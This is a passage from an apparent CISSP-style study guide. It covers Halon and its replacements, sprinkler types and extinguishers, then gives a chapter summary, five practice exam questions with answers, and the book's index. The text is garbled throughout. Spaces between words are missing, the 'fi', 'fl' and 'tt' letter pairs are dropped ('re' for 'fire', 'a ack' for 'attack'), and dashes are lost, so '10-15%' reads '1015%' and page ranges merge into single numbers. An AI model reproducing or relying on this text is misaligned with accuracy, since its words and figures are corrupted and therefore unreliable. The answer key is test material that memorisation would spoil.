Halonextinguishesreviaachemicalreactionthatconsumesenergyand
lowersthetemperatureofthere.Halonisbeingphasedout,andanumber
ofreplacementswithsimilarpropertiesarenowused.
Montreal Accord

Halonhasozonedepletingproperties.Duetothiseect,the1989Montreal
Protocol(formallycalledtheMontrealProtocolonSubstancesThatDeplete
theOzoneLayer)bannedproductionandconsumptionofnewHalonin
developedcountriesbyJanuary1,1994.ExistingHalonsystemsmaybeused.
WhilenewHalonisnotbeingproduced,recycledHalonmaybeused.

FastFacts
RecommendedreplacementsforHalonincludethefollowingsystems:
Argon

FE13
FM200
Inergen
FE13isthenewestoftheseagentsandcomparativelysafe.Itmaybe
breathedinconcentrationsofupto30%.OtherHalonreplacementsare
typicallyonlysafeupto1015%concentration.

Sprinkler systems

Wetpipeshavewaterrightuptothesprinklerheads:thepipesarewet.The
sprinklerheadcontainsametal(commoninoldersprinklers)orsmallglass
bulbdesignedtomeltorbreakataspecictemperature.Oncethatoccurs,the
sprinklerheadopensandwaterows.Eachheadwillopenindependentlyas
thetriggertemperatureisexceeded.
Drypipesystemsalsohaveclosedsprinklerheads:thedierenceisthepipes
arelledwithcompressedair.Thewaterisheldbackbyavalvethatremains
closedaslongassucientairpressureremainsinthepipes.Asthedrypipe
sprinklerheadsopen,theairpressuredropsineachpipe,allowingthevalve
toopenandsendwatertothathead.
Delugesystemsaresimilartodrypipes,exceptthesprinklerheadsareopen
andlargerthandrypipeheads.Thepipesareemptyatnormalairpressure;
thewaterisheldbackbyadelugevalve.Thevalveisopenedwhenare
alarm(thatmaymonitorsmokeoramesensors)triggers.
Preactionsystemsareacombinationofwet,dry,ordelugesystemsand
requiretwoseparatetriggerstoreleasewater.Singleinterlocksystemsrelease
waterintothepipeswhenarealarmtriggers.Thewaterreleasesoncethe
headopens.Doubleinterlocksystemsusecompressedair(sameasdry
pipes):thewaterwillnotllthepipesuntilboththerealarmtriggersand
thesprinklerheadopens.
Portable fire extinguishers

Allportablereextinguishersshouldbemarkedwiththetypeofretheyare

designedtoextinguish.Portableextinguishersshouldbesmallenoughtobe
operatedbyanypersonnelwhomayneedtouseone.

Summary of Exam Objectives

Inthischapter,wediscussedavarietyofphysicalandenvironmentalsecurity
controls.Safetyisthebiggestconcernofthephysicalandenvironmental
securitydomain.Forexample,whilepanicbarscanlowerthesecurityofa
datacenter(anopenedemergencydoorcanbeusedforingress,without
providinganyauthentication),theymakethedatacentersafer.Fastandsafe
egresstrumpsanyconcernfordataorassets.
Physicalsecurityisimplicitinmostothersecuritycontrolsandisoften
overlooked.Wemustalwaysseekbalancewhenimplementingcontrolsfrom
all10domainsofknowledge.Allassetsshouldbeprotectedbymultiple
defenseindepthcontrolsthatspanmultipledomains.Forexample,ale
servercanbeprotectedbypolicy,procedures,accesscontrol,patching,
antivirus,OShardening,locks,walls,HVAC,andresuppressionsystems
(amongothercontrols).Athoroughandaccurateriskassessmentshouldbe
conductedforallassetsthatmustbeprotected.Takecaretoensureno
domainsorcontrolsareoverlookedorneglected.
Wehavealsoshownthatpropersiteselectioniscriticalforanydatacenter;it
isdiculttoovercomeapoorsiteselectionwithadditionalcontrols.Issues
suchastopography,crime,andutilityreliabilityfactorintositeselection
choice.

TOP FIVE TOUGHEST QUESTIONS

1.WhatshouldnotbeusedtoextinguishaclassC(UnitedStates)re?
A.Sodaacid
B.CO2
C.Inergen
D.FE13
2.YouneedtodiscardmagneticharddrivescontainingPersonally

IdentiableInformation(PII).WhichmethodforremovingPIIfromthe
magneticharddrivesisconsideredbest?
A.Overwriteeverysectoroneachdrivewithzeroes
B.Deletesensitiveles
C.Degaussanddestroy
D.Reformatthedrives
3.Whatistheprimarytypeofsecuritycontroloeredbyemployingaround
theclockingresscontrabandchecks?
A.Preventive
B.Directive
C.Deterrent
D.Corrective
4.Whatshouldbetrueofthesinglepointofentrydoorthatprovidesaccess
toanareaofabusinesswheretradesecretsaremaintained?
A.Thedoormustberatedtoprovideanequivalentbarriertoentranceasthe
walls.
B.Thedooringress/egressmustincorporatecapabilitiestoaccountforall
individualsentering/exiting.
C.Thedoormustnothaveaneasilybypassedlockingmechanismdueto
accountabilityconcerns.
D.Thedoormustprovidewhollyunimpededegressduringanyemergency
conditions.
5.Whichphysicalsecuritycomponentincorporatesnonrepudiation?
A.Smartcards

B.Contrabandchecks
C.Turnstiles
D.Securityguards

ANSWERS
1.Correctanswerandexplanation:A.AnswerAiscorrect;classCresare
electricalres(Cforconductive).Sodaacidcontainswater,whichisan
electricalconductor,andshouldnotbeusedtoextinguishaclassCre.
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect;allaregasesthatwillnotconductelectricity.CO2gasstarvesthe
reofoxygen,andInergenandFE13areHalonsubstitutesthatchemically
interruptre.
2.Correctanswerandexplanation:C.AnswerCiscorrect;degaussingand
destroyingtheharddrivesisconsideredmostsecure.Itoershighassurance
thatthedatahasbeenremoved,andvisualinspectionofthedestroyeddrives
providesassuranceagainsterrorsmadeduringthedestructionprocess.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect;theyalloerweakerprotectionagainstexposureofthePIIonthe
drives.Overwritingthediskprovidesreasonableprotection;however,errors
madeduringtheoverwritingprocesswillnotbeevidentfromvisual
inspection.DeletingsensitivesimplyremovestheFileAllocationtable(FAT)
entry;thedatausuallyremainsasunallocatedspace.Reforma ingthedrives
replacestheentireFATwithanewone,buttheolddatausuallyremainsas
unallocatedspace.
3.Correctanswerandexplanation:C.AnswerCiscorrect;deterrenceisthe
primarytypeofcontroloeredbycontrabandchecks,ofthoselisted.
Contrabandchecksarecasuallythoughttobeadetectivecontrol,buttheir
presencebeingknownmakesthemalsoadeterrenttoactualthreats.Given
thatdetectivewasnotlistedmakestheanswereasier.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect;noneoftheseoptionsaretheprimarytypeofcontrol.Thechecks
canleadtoapreventivecontrolbeingemployed(assumingathreatisrst
detected);however,thatisnottheirprimaryrole.Contrabandchecksoer
morethansimplyindicatingexpectedbehaviors,sotheyarenotprimarily

directive.Thoughcontrabandcheckscaninformcorrectiveactions,theyare
notthemselvesprimarilyacorrectivecontrol.
4.Correctanswerandexplanation:D.AnswerDiscorrect;unimpededegress
duringemergencyconditionsiscritical.Rememberthatsafetyisthemost
importantfactor,evenmoreimportantthantheprotectionoftradesecrets.
Incorrectanswersandexplanations:A,B,andC.AnswersA,B,andCare
incorrect;thougheachcouldproveusefulfromaphysicalsecurity
standpoint,safetyismoreimportantandthereforethebestanswer.Doors
shouldprovideabarriertoentryatleastequivalenttothatofwalls.Given
thattradesecretsaremaintained,accountingforallingressandegressseems
appropriatetoo.Doorsalsoshouldnotbeeasilybypassed.
5.Correctanswerandexplanation:A.AnswerAiscorrect.Smartcards
incorporateachipthatcontainstheprivatekeyportionofapublic/private
keypairandcanbeusedtoprovethatone,andonlythatoneperson,could
haveperformedspecicactions.
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect;theyalldonotallowforprovingthataparticularpersoncarried
outanactionandthereforedonotprovidenonrepudiation.Contraband
checkshaveli lebearingonnonrepudiation.Turnstilescanhelptofendo
tailgatingorpiggybacking,whichcanhelptoensuresomesimple
accountability,butwouldnotmeetthelevelofnonrepudiation.Security
guardshavemanyuses,andtheirtestimonycanproveextremelyvaluable,
but,again,theydonotprovidefortechnicalnonrepudiationinthewaythat
smartcardsdo.

Index
Note:Pagenumbersfollowedbyfindicateguresandtindicatetables.
A
Abstraction,96
Accesscontrol
assessments
penetrationtesting,1718
securityassessments,19
securityaudit,18
vulnerabilityscanning,18
authenticationmethods,See(Authenticationmethods)
cornerstoneinformationsecurityconcepts
accountability, 3
authorization, 3
availability, 2
condentiality, 1
DAD, 2
defenseindepth, 4
identityandauthentication, 3

integrity, 2
leastprivilege, 3
nonrepudiation, 3
subjectsandobjects, 3
models
accessreviewandaudit, 6
ACL, 5
centralizedaccesscontrol, 5
DAC, 4
diameter, 6
MAC, 4
PAPandCHAP, 7
provisioninglifecycle,56
RADIUS, 6
RBAC,45
rulebasedaccesscontrol, 5
TACACSandTACACS+, 6
userentitlement, 6
technology
FIdM,16
Kerberos,1617
SESAME,17

SingleSignOn,16
types,78
Accesscontrollists(ACLs), 5
Accesscontrolmatrix,111
Accreditation,113114
Adaptivechosenciphertext,86
Adaptivechosenplaintext,86
Administrative/regulatorylaw,157
Administrativesecurity
backgroundchecks,119
clearance,118
labels,117118
mandatoryleave/forcedvacation,118
NDA,119
rotationofduties,118
separationofduties,118
Advanceandprotecttheprofession,167
AdvancedEncryptionStandard(AES),83
Agilesoftwaredevelopment,65
Annualizedlossexpectancy(ALE)
ARO,48
assetvalue,4748
denition,47
exposurefactor,48
SLE,48
AnnualRateofOccurrence(ARO),48
Antivirus,34
Applets,107

Applicationdevelopmentsecurity
agilesoftwaredevelopment,65
RAD,65
SDLC,6566
spiralmodel,65
waterfallmodel,65
Applicationlayer,26
Arithmeticlogicunit(ALU),98
Assemblylanguage,64
Assetmanagement,121122
Assetvalue(AV),4748
Asymmetricencryption
discretelogarithm,84
ECC,85
primenumberfactoring,84
privatekey,84
tradeos,85
Asynchronousdynamictokens,11
Authentication,authorization,andaccountability(AAA),23
AuthenticationHeader(AH),90
Authenticationmethods
asynchronousdynamictokens,11
biometriccontrol
dynamicsignatures,15
facialscan,15
ngerprints,13
handgeometry,1415
irisscan,14
keyboarddynamics,15

retinascan,1314
voiceprint,15
biometricsystems
crossovererrorrate,1213,13f
enrollmentandthroughput,12
falseacceptrate,12
falserejectrate,12
locationbasedaccesscontrol,15
multifactorauthentication, 9
passwords
bruteforcea acks, 6
cracking,10
dictionarya ack,10
dynamicpasswords, 9
hashing,10
hybrida ack,10
onetimepasswords, 9
passphrases, 9
rainbowtable, 6
salt,1011
staticpasswords, 9
synchronousdynamictokens,11
B
Baselining,121
BasicInputOutputSystem(BIOS),102

BCP,SeeBusinessContinuityPlanning(BCP)
BellLaPadulamodel,109110
Bibamodel,110111
Biometricsystems
crossovererrorrate,1213,13f
enrollmentandthroughput,12
falseacceptrate,12
falserejectrate,12
Bluetooth,38
Bollard,172
BrewerNashmodel,111
Bruteforcea acks, 6
Bueroverows,105
BusinessContinuityInstitute(BCI),150
BusinessContinuityPlanning(BCP)
changemanagement,148149
denition,135
development
BIA,140142
CallTree,144145
contingencyplanningguide,139140
criticalstateassessment,140
plans,144
preventivecontrols,142143
projectinitiation,140
recoverystrategy,143144
disaster/disruptiveevents,137138
disasterrecoveryprocess,138139

vs.DRP,136137
faults,149
frameworks
BCI,150
ISO/IEC27031,149150
NISTSP80034,149
BusinessImpactAnalysis(BIA),140142
Bytecode,64
C
Cablemodems,40
Cachememory,100
CallTree,144145
CapabilityMaturityModel(CMM),7071
Ceilings,174
Centralprocessingunit(CPU)
ALU,98
CISC,100
fetchandexecute,98
interrupt,99
multiprocessing,99100
multitasking,99
pipelining,9899
processandthreads,99
RISC,100
CerticateRevocationLists(CRL),89
ChallengeHandshakeAuthenticationProtocol(CHAP), 7 ,35
Changemanagement,122
Chinesewallmodel,111

CipherBlockChaining(CBC),81
Civillaw,155156,157
ClarkWilsonmodel,111
Clearance,118
ClosedCircuitTelevision(CCTV),172
Closedsourcesoftware,64
Cloudcomputing,103104
Coldsite,144
Commonlaw,156
Compilers,64
ComplexInstructionSetComputer(CISC),100
ComponentObjectModel(COM),68
Computerbus,97
Computercrimes,158
ComputerFraudandAbuseAct,163
ComputerSecurityIncidentResponseTeam(CSIRT),127
Computerviruses,106
Condentiality,integrity,andavailability(CIA),12
Congurationmanagement,121122
ContinuityofOperations
fullbackup,123
incremental/dierentialbackup,123
RAID,See(Redundantarrayofinexpensivedisks(RAID))
SLA,123
systemredundancy,127
Contrabandchecks,174
ControlObjectivesforInformationandrelatedTechnology(COBIT),58
Copyright,159
Covertchannel,105

Criminallaw,156157
Crippleware,64
Crossovererrorrate(CER),1213
Cryptography
SeealsoEncryption
adaptivechosenciphertext,86
adaptivechosenplaintext,86
authentication,78
bruteforcea ack,86
chosenciphertext,86
chosenplaintexta ack,86
condentialityandintegrity,78
denition,77
dierentialcryptanalysis,87
hashfunction
HAVAL,86
MD5,85
securehashalgorithm,85
implementation
digitalsignatures,88
escrowedencryption,91
IPsec,9091
PGP,91
PKI,89
S/MIME,91
SSLandTLS,8990
knownkeya ack,87
knownplaintexta ack,86
linearcryptanalysis,87

meetinthemiddlea ack,87
monoalphabeticandpolyalphabeticciphers,78
nonrepudiation,78
sidechannela acks,87
strength,78
substitutionandpermutation,78
types,79
XOR,79
Customarylaw,156
D
Databasesecurity,109
Datadestruction,120121
DataEncryptionStandard(DES),80
denition,80
modes
CBC,81
cipherfeedback,81
counter,82
ECB,81
outputfeedback,81
singleDES,82
TDES,82
Datalink,25
Delugesystems,182
DenialofService(DoS),130
Dictionarya ack,10
Dierentialbackup,123
DieHellmanKeyAgreementProtocol,84

Digitalforensics
embeddeddevices,165
mediaanalysis,164
networkforensics,164165
Digitalsignatures,88
DigitalSubscriberLine(DSL),40
DirectSequenceSpreadSpectrum(DSSS),37
Disaster,137138
DisasterRecoveryPlanning(DRP)
vs.BCP,136137
changemanagement,148149
denition,136
development
BIA,140142
CallTree,144145
contingencyplanningguide,139140
criticalstateassessment,140
plans,144
preventivecontrols,142143
projectinitiation,140
recoverystrategy,143144
disaster/disruptiveevents,137138
disasterrecoveryprocess,138139
faults,149
frameworks
BCI,150
ISO/IEC27031,149150
NISTSP80034,149
testing

checklist/consistency,146147
parallelprocessing,147
partialandcompletebusinessinterruption,147148
review,146
simulationtest/walkthroughdrill,147
structuredwalkthrough/tabletop,147
training,148
Disasterrecoveryprocess,138139
Disclosure,alteration,anddestruction(DAD), 2
Discretionaryaccesscontrol(DAC), 4
Diskencryption,34
Disruptiveevents,137138
Distributedcomponentobjectmodel(DCOM),6869
DistributedDenialofService(DDoS),130
Dogs,175
DomainNameSystem(DNS),29
Doors,174
DRP,SeeDisasterRecoveryPlanning(DRP)
Drypipesystems,182
Dynamicpasswords, 9
DynamicRandomAccessMemory(DRAM),101
E
ElectricallyErasableProgrammableReadOnlyMemory(EEPROM),102
Electricity,178
ElectronicCodeBook(ECB),81
EllipticCurveCryptography(ECC),85
EncapsulatingSecurityPayload(ESP),90

Encryption
asymmetricencryption
discretelogarithm,84
ECC,85
primenumberfactoring,84
privatekey,84
tradeos,85
symmetricencryption
AES,83
BlowshandTwosh,83
chaining,80
DES,See(DataEncryptionStandard(DES))
IDEAalgorithm,82
initializationvectors,80
RC5andRC6,83
secretkey,79
streamandblockciphers,80
Endpointsecurity
antivirus,34
applicationwhitelisting,34
diskencryption,34
removablemediacontrols,34
ErasableProgrammableReadOnlyMemory(EPROM),102
Escrowedencryption,91
Ethics
2

(ISC) Code,166167
ComputerEthicsInstitute,167
IAB,168
ExclusiveOr(XOR),79

Exposurefactor(EF),48
ExtensibleAuthenticationProtocol(EAP),3536
ExtensibleMarkupLanguage(XML),108
Extranet,24
ExtremeProgramming(XP),65
F
Falseacceptrate(FAR),12
Falserejectrate(FRR),12
FederatedIdentityManagement(FIdM),16
FileTransferProtocol(FTP),29
Firesuppressionsystems
classesof,180
CO2,181
delugesystems,182
drypipesystems,182
drypowder,181
Halon,182
portablereextinguishers,183
preactionsystems,182183
sodaacid,181
water,180181
wetchemicals,181
wetpipes,182
Firmware,102
Flamedetectors,179
Flashmemory,102
Floors,perimeterdefenses,174
FrameRelay,30

Freeware,64
FrequencyHoppingSpreadSpectrum(FHSS),37
Fullbackup,123
FullDiskEncryption(FDE),34
Fullduplexcommunications,24
G
Globalpositioningsystem(GPS),15
GreatestLowerBound(GLB),110
Gridcomputing,104
H
Halfduplexcommunications,24
Halon,182
Hashfunction
HAVAL,86
MD5,85
securehashalgorithm,85
Hashofvariablelength(HAVAL),86
Heatdetectors,179
Heating,ventilation,andairconditioning(HVAC),178179
Hosttohosttransportlayer,27
Hotsite,143
HypertextTransferProtocol(HTTP),29
HypertextTransferProtocolSecure(HTTPS),29
I
Incidentresponsemanagement
DDoS,130
DoS,130

malware/maliciouscode/software,130
methodology
containmentphase,129
detectionandanalysis,128129
eradicationphase,129
lessonslearnedphase,129
NISTlifecycle,127128,128f
preparation,128
recoveryphase,129
MITM,130
sessionhijacking,129
Incrementalbackup,123
Informationsecuritygovernance
auditingandcontrolframeworks
COBIT,58
ISO17799andISO27000series,58
ITIL,5859
OCTAVE,57
certicationandaccreditation,59
duecareandduediligence,57
personnelsecurity
backgroundcheck,55
employeetermination,5556
outsourcingandoshoring,56
securityawarenessandtraining,56
vendors,consultants,andcontractors,56
privacy,5657
rolesandresponsibility,5455
securitypolicyanddocuments

baselines,54,54t
guidelines,54
policy,5253
standard,54
InformationTechnologyInfrastructureLibrary(ITIL),5859
InformationTechnologySecurityEvaluationCriteria(ITSEC),112113
InternationalDataEncryptionAlgorithm(IDEA),82
Internet,24,2627
InternetActivitiesBoard(IAB),168
InternetControlMessageProtocol(ICMP),28
InternetKeyExchange(IKE),91
InternetProtocolSecurity(IPsec),9091
InternetProtocolversion4(IPv4),2728
InternetProtocolversion6(IPv6),28
Interpretedlanguages,64
IntrusionDetectionSystem(IDS),34
IntrusionPreventionSystem(IPS),34
K
Kerberos,1617
Kernel,102103
Knownkeya ack,87
Knownplaintexta ack,86
L
Legalsystems
administrative/regulatorylaw,157
civillaw,155156,157
commonlaw,156
ComputerFraudandAbuseAct,163

contractualsecurity
a estation,165
RighttoPenetrationTest/RighttoAudit,165166
SLA,165
criminallaw,156157
customarylaw,156
digitalforensics
embeddeddevices,165
mediaanalysis,164
networkforensics,164165
ethics
2

(ISC) Code,166167
ComputerEthicsInstitute,167
IAB,168
informationsecurity
computercrimes,158
import/exportrestrictions,160
intellectualproperty,158160
investigations
enticement,161
entrapment,161
evidence,161
evidenceintegrity,161
privacy
EuropeanUnion,162
EUUSsafeharbor,163
OECD,162163
PrivacyActof1974,163
religiouslaw,156

USAPATRIOTAct,163164
vendorgovernance,166
Linearcryptanalysis,87
LocalAreaNetworks(LANs)
networkarchitectureanddesign,29
Locationbasedaccesscontrol,15
M
Magneticstripecard,173
Maintenancehooks,106
Maliciouscode/malware,106107
Malware,130
Mandatoryaccesscontrol(MAC), 4
ManintheMiddle(MITM),130
Mantrap,173
MaximumTolerableDowntime(MTD),141
MeanTimeBetweenFailures(MTBF),142
MeanTimetoRepair(MTTR),142
MediaAccessControl(MAC),27
Mediasanitization,120121
Mediasecurity
handling,119120
labeling/marking,119
mediasanitization/datadestruction,120121
retention,120
storage,120
Meetinthemiddlea ack,87
Memory
cachememory,100

DRAM,101
Firmware,102
hardwaresegmentation,101
processisolation,101
RAM,100
ROM,100
SRAM,101
virtualmemory,101
MessageDigestalgorithm5(MD5),85
MinimumOperatingRequirements(MOR),142
Mobilesite,144
Modem,33
Multiprocessing,99100
MultiprotocolLabelSwitching(MPLS),30
Multitasking,99
N
NationalInstituteofStandardsandTechnology(NIST),127128,128f
Networkaccesslayer,26
Networkarchitectureanddesign
basicconcepts,2324
LANtechnology,29
OSImodel,See(OpenSystemInterconnection(OSI)model)
TCP/IPmodel,See(TransmissionControlProtocol/InternetProtocol(TCP/IP))
TCP/IPsapplicationlayer,2829
WANtechnology,30
Networka acks
DoSandDDoS,130
malware,130

MITM,129130
sessionhijacking,129130
Networkdevicesandprotocols
bridges,31
endpointsecurityproduct,34
IDSandIPS,34
modem,33
packetlter,32,32f
proxyrewalls,33
repeatersandhubs,3031
routers,32
statefulrewalls,3233
switch,31,31f
Networkswitch,31,31f
Nondisclosureagreement(NDA),119
Nonrepudiation, 3
O
ObjectOrientedProgramming(OOP)
concepts,6768
denition,66
ORBs,6869
ObjectRequestBrokers(ORBs)
COM,68
DCOM,6869
Onetimepasswords, 9
Opensourcesoftware,64
OpenSystemInterconnection(OSI)model,24

applicationlayer,26
datalink,25
network,25
physicallayer,25
presentationlayer,26
session,25
transportlayer,25
OpenWebApplicationSecurityProject(OWASP),107108
OperationallyCriticalThreat,Asset,andVulnerabilityEvaluation(OCTAVE
),57
Operationssecurity
administrativesecurity
backgroundchecks,119
clearance,118
labels,117118
mandatoryleave/forcedvacation,118
NDA,119
rotationofduties,118
separationofduties,118
assetmanagement,121122
continuityofoperations
fullbackup,123
incremental/dierentialbackup,123
RAID,See(Redundantarrayofinexpensivedisks(RAID))
SLA,123
systemredundancy,127
incidentresponsemanagement,See(Incidentresponsemanagement)
sensitiveinformation/mediasecurity
handling,119120

labeling/marking,119
mediasanitization/datadestruction,120121
retention,120
storage,120
OrangeBook,112
OrganizationforEconomicCooperationandDevelopment(OECD),162163
OrthogonalFrequencyDivisionMultiplexing(OFDM),37
P
Packetlter,32,32f
Passiveinfrared(PIR)sensor,174
Passphrases, 9
PasswordAuthenticationProtocol(PAP), 7 ,35
Passwordcracking,1011
Passwordhashes,1011
Patent,159
PaymentCardIndustryDataSecurityStandard(PCIDSS),113
Peertopeer(P2P)network,105
Penetrationtest,1718
Perimeterdefenses
bollard,172
CCTV,172
contrabandchecks,174
dogs,175
doors,174
fences,171
gates,171172
glasswindows,174

guards,175
lights,172
locks,172173
magneticstripecard,173
mantrap,173
panicbars,174
passiveinfrared(PIR)sensor,174
photoelectricmotionsensor,174
smartcard,173
tailgating/piggybacking,173
turnstiles,173
ultrasonic/microwavemotiondetectors,174
walls,oors,andceilings,174
PermanentVirtualCircuit(PVC),30
PersonallyIdentiableInformation(PII), 1
Photoelectricmotionsensor,174
Physicallayer,25
Physical(environmental)security
environmentalcontrols
electricity,178
resuppressionsystems,See(Firesuppressionsystems)
amedetectors,179
heatdetectors,179
HVAC,178179
personnelsafety,179
safetyawareness,179
safetytraining,179
smokedetectors,179

perimeterdefenses
bollard,172
CCTV,172
contrabandchecks,174
dogs,175
doors,174
fences,171
gates,171172
glasswindows,174
guards,175
lights,172
locks,172173
magneticstripecard,173
mantrap,173
panicbars,174
passiveinfrared(PIR)sensor,174
photoelectricmotionsensor,174
smartcard,173
tailgating/piggybacking,173
turnstiles,173
ultrasonic/microwavemotiondetectors,174
walls,oors,andceilings,174
sitedesignandcongurationissues,175176
siteselectionissues,175
systemdefenses
assettracking,176
driveandtapeencryption,177
mediacleaninganddestruction,177178
mediastorageandtransportation,177

portcontrols,176
Piggybacking,173
Pipelining,9899
PortBasedNetworkAccessControl,3536
PowerOnSelfTest(POST),102
Preactionsystems,182183
Presentationlayer,26
Pre ygoodprivacy(PGP),91
Preventivecontrols,142143
Privacy
EuropeanUnion,162
EUUSsafeharbor,163
OECD,162163
PrivacyAct,163
PrivacyActof1974,163
PrivilegeA ributeCerticates(PACs),17
Processisolation,101
ProgrammableLogicDevice(PLD),102
ProgrammableReadOnlyMemory(PROM),102
Programmingconcepts
assemblylanguage,64
bytecode,64
compilers,64
interpreters,64
machinecode,6364
publiclyreleasedsoftware,64
sourcecode,6364
Proxyrewalls,33
Publickeyinfrastructure(PKI),89

Q
Qualitativeriskanalysis,51
Quantitativeriskanalysis,51
Querylanguage,71
R
RadioFrequencyIdentication(RFID),39,173
Rainbowtable, 6
Randomaccessmemory(RAM),100
Rapidapplicationdevelopment(RAD),65
ReadOnlyMemory(ROM),100
RealtimeTransportProtocol(RTP),37
Reciprocalagreement,144
RecoveryPointObjective(RPO),141142
Recoverystrategy
coldsite,144
hotsite,143
mobilesite,144
reciprocalagreement,144
redundantsite,143
warmsite,143
ReducedInstructionSetComputer(RISC),100
Redundantarrayofinexpensivedisks(RAID)
hammingcode,125
mirroredset,124
RAID1+0/RAID10,126
stripedset
withdedicatedparity,125

withdistributedparity,125126
withdualdistributedparity,126
readandwrite,124
Redundantsite,143
Religiouslaw,156
Remoteaccess
cablemodems,40
DSL,40
instantmessaging,4041
remotedesktopconsoleaccess,39
remotemeetingtechnology,41
RemoteAuthenticationDialInUserService(RADIUS), 6
RemoteDesktopProtocol(RDP),39
RemoteProcedureCalls(RPCs),2526
ReturnonInvestment(ROI),4950
Ringmodel,9697
Riskanalysis
ALE,48
ARO,48
assetvalue,4748
exposurefactor,48
SLE,48
assets,45
budgetandmetrics,50
impact,46
matrix,4647
qualitativeandquantitative,51
riskchoices

acceptance,50
avoidance,51
mitigating,51
transfer,51
riskmanagementprocess,5152
ROI,4950
TCO,4849
threatandvulnerability,46
RobustSecurityNetwork(RSN),38
Rolebasedaccesscontrol(RBAC), 4
Rootkits,106107
Routers,32
S
Securecommunications
authenticationprotocolsandframeworks,3536
desktopandapplicationvirtualization,3940
remoteaccess
cablemodems,40
DSL,40
instantmessaging,4041
remotedesktopconsoleaccess,39
remotemeetingtechnology,41
RFID,39
VoIP,37
VPN,36
WLANs,See(WirelessLocalAreaNetworks(WLANs))
SecureEuropeanSystemforApplicationsinamultivendorenvironment
(SESAME),17

Secure/MultipurposeInternetMailExtensions(S/MIME),91
SecureSocketsLayer(SSL),36,8990
Securityarchitectureanddesign
accesscontrolmatrix,111
BellLaPadulamodel,109110
Chinesewallmodel,111
evaluationmethods
accreditation,113114
certication,113114
InternationalCommonCriteria,113
ITSEC,112113
OrangeBook,112
PCIDSS,113
hardwarearchitecture
computerbus,97
CPU,See(Centralprocessingunit(CPU))
systemunitandmotherboard,97
integrity,110111
la icebasedaccesscontrol,110
memory
cachememory,100
DRAM,101
Firmware,102
hardwaresegmentation,101
processisolation,101
RAM,100
ROM,100
SRAM,101
virtualmemory,101

operatingsystemandsoftwarearchitecture
cloudcomputing,103104
gridcomputing,104
kernel,102103
peertopeer(P2P)network,105
thinclients,105
virtualization,103
securesystemdesign
abstraction,96
layering,9596
ringmodel,9697
securitydomain,96
systemthreats,vulnerabilities,andcountermeasures
bueroverows,105
covertchannel,105
databasesecurity,109
maintenanceHooks,106
maliciouscode/malware,106107
mobiledevicea acks,108109
TOCTOU/raceconditions,105
webarchitectureanda acks,107108
SecurityAssertionMarkupLanguage(SAML),108
Separationofduties,118
ServiceLevelAgreements(SLA),123,165
ServiceOrientedArchitecture(SOA),108
Shareware,64
Sidechannela acks,87
Simplexcommunication,24
Simulationtest,147

SingleLossExpectancy(SLE),48
SingleSignOn(SSO),16
Smartcard,173
Smokedetectors,179
Softwaredevelopmentsecurity
applicationdevelopmentmethod
agilesoftwaredevelopment,65
RAD,65
SDLC,6566
spiralmodel,65
waterfallmodel,65
CMM,7071
databases
candidatekeys,71
denition,71
employeetable,71
foreignkey,72
integrity,74
normalization,73
querylanguages,7374
referential,semantic,andentity,7273
replicationandshadowing,74
views,73
disclosure,70
OOP
concepts,6768
denition,66
ORBs,6869
programmingconcepts

assemblylanguage,64
bytecode,64
compilers,64
interpreters,64
machinecode,6364
publiclyreleasedsoftware,64
sourcecode,6364
softwarevulnerabilities,6970
Softwarelicenses,160
Spiralmodel,65
Statefulrewalls,3233
Staticpasswords, 9
StaticRandomAccessMemory(SRAM),101
SwitchedVirtualCircuit(SVC),30
Symmetricencryption
AES,83
BlowshandTwosh,83
chaining,80
DES,See(DataEncryptionStandard(DES))
IDEAalgorithm,82
initializationvectors,80
RC5andRC6,83
secretkey,79
streamandblockciphers,80
Synchronousdynamictokens,11
Systemdefenses
assettracking,176
driveandtapeencryption,177

mediacleaninganddestruction,177178
mediastorageandtransportation,177
portcontrols,176
Systemredundancy,127
Systemsdevelopmentlifecycle(SDLC),6566
T
Tabletop,147
Tailgating,173
Telecommunicationsandnetworksecurity
devicesandprotocols,See(Networkdevicesandprotocols)
networkarchitectureanddesign,See(Networkarchitectureanddesign)
securecommunications,See(Securecommunications)
Telnet,29
TenCommandmentsofComputerEthics,167168
TerminalAccessControllerAccessControlSystem(TACACS), 6
Thinclients,105
TimeofCheck/TimeofUse(TOCTOU),105
TotalCostofOwnership(TCO),4849
Trademark,159
Tradesecrets,160
TransmissionControlProtocol/InternetProtocol(TCP/IP),28
applicationlayer,27
hosttohosttransport,27
ICMP,28
internet,2627
IPv4,2728
IPv6,28
MACaddresses,27

networkaccesslayer,26
UDP,28
TransportLayer,25
TransportLayerSecurity(TLS),36,8990
Trojanhorse,106
Turnstiles,173
Type1authentication,911
Type2authentication,11
U
Ultrasonic/microwavemotiondetectors,174
UnshieldedTwistedPair(UTP),25
USAPATRIOTAct,163164
UserDatagramProtocol(UDP),28
V
Virtualization,103
Virtualmemory,101
VirtualNetworkComputing(VNC),39
VirtualPrivateNetworks(VPNs),36
VoiceoverInternetProtocol(VoIP),37
Vulnerabilitymanagement,122
Vulnerabilityscanning,18
W
Walkthroughdrill,147
Walls,perimeterdefenses,174
Warmsite,143
Waterfallmodel,65
Wetchemicals,181

WideAreaNetwork(WAN),30
WiFiProtectedAccess2(WPA2),38
WiredEquivalentPrivacy(WEP),38
WirelessLocalAreaNetworks(WLANs)
802.11abgn,3738
bluetooth,38
FHSS,DSSS,andOFDM,37
802.11i,38
WEP,38
WorkRecoveryTime(WRT),142
X
XML,SeeExtensibleMarkupLanguage(XML)
XOR,SeeExclusiveOr(XOR)
Z
Zerodayexploits,122
Zerodayvulnerabilities,122
Zeroknowledgetest,18